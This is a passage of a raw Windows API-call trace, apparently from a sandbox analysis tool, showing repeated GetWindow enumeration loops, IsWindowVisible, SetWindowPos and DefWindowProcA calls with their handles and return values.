0x101c8 [0057.509] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.510] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.510] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.510] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.510] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.510] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.510] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.510] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.510] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.510] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.510] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.510] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.510] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.510] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.510] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.510] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.510] GetWindow (hWnd=0x10178, 
uCmd=0x2) returned 0x1017a [0057.510] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.510] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.510] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.510] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.510] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.510] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.510] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.510] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.510] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.511] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.511] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.511] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.511] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.511] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.511] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.511] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.511] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.511] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.511] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.511] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.511] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.511] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.511] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.511] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.511] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.511] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.511] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.511] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.511] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.511] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.511] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.511] 
GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.511] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.512] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.512] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.512] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.512] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.512] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.512] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.512] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.512] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.512] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.512] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.512] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.512] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.512] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.512] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.512] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.512] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.512] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.512] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.512] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.512] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.512] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.512] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.512] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.512] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.512] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.513] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.513] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.513] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.513] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.513] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 
0x200fc [0057.513] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.513] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.513] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.513] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.513] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.513] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.513] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.513] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.513] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.513] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.513] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.513] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.513] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.513] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.513] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.513] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.513] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.514] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.514] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.514] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.514] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.514] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.514] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.514] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.514] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.514] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.514] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.514] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.514] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.514] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 
[0057.514] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.514] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.514] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.514] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.514] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.514] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.514] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.514] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.514] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.514] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.514] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.514] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.514] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.514] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.514] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.514] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.514] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.514] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.514] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.515] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.515] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.515] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.515] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.515] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.515] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.515] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.515] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.515] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.515] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.515] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.515] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.515] GetWindow (hWnd=0x10180, uCmd=0x2) returned 
0x10182 [0057.515] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.515] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.515] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.515] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.515] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.515] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.515] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.515] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.515] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.515] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.515] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.515] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.515] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.515] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.515] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.515] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.515] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.515] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.515] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.516] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.516] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.516] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.516] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.516] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.516] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.516] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.516] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.516] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.516] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.516] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.516] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.516] GetWindow (hWnd=0x10138, 
uCmd=0x2) returned 0x1013c [0057.516] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.516] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.516] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.516] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.516] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.516] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.516] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.516] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.516] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.516] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.516] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.516] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.516] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.516] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.516] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.516] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.516] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.516] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.517] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.517] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.517] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.517] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.517] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.517] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.517] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.517] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.517] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.517] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.517] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.517] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.517] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.517] 
GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.517] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.517] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.517] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.517] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.517] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.517] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.517] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.517] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.517] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.517] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.517] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.517] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.517] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.517] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.517] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.517] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.517] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.517] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.518] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.518] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.518] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.518] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.518] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.518] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.518] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.518] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.518] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.518] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.518] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.518] GetWindow 
(hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.518] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.518] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.518] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.518] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.518] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.518] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.518] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.518] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.518] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.518] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.518] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.518] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.518] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.518] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.518] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.518] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.519] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.519] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.519] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.519] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.519] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.519] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.519] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.519] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.519] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.519] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.519] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.519] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.519] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.519] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.519] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.519] 
GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.519] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.519] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.519] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.519] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.519] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.519] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.519] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.519] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.519] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.520] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.520] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.520] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.520] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.520] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.520] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.520] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.520] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.520] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.520] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.520] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.520] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.520] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.520] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.520] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.520] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.520] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.520] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.520] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.520] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.520] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.520] GetWindow (hWnd=0x10144, uCmd=0x2) returned 
0x10148 [0057.520] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.520] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.521] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.521] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.521] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.521] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.521] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.521] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.521] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.521] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.521] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.521] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.521] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.521] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.521] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.521] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.521] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.521] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.521] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.521] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.521] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.521] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.521] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.521] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.521] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.521] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.521] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.522] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.522] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.522] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.522] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.522] GetWindow (hWnd=0x100e4, 
uCmd=0x2) returned 0x100da [0057.522] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.522] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.522] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.522] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.522] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.522] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.522] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.522] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.522] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.522] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.522] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.523] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.523] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.523] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.523] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.523] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.523] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.523] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.523] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.523] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.523] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.523] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.523] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.523] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.523] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.523] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.523] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.523] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.523] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.523] GetWindow (hWnd=0x200c6, uCmd=0x2) 
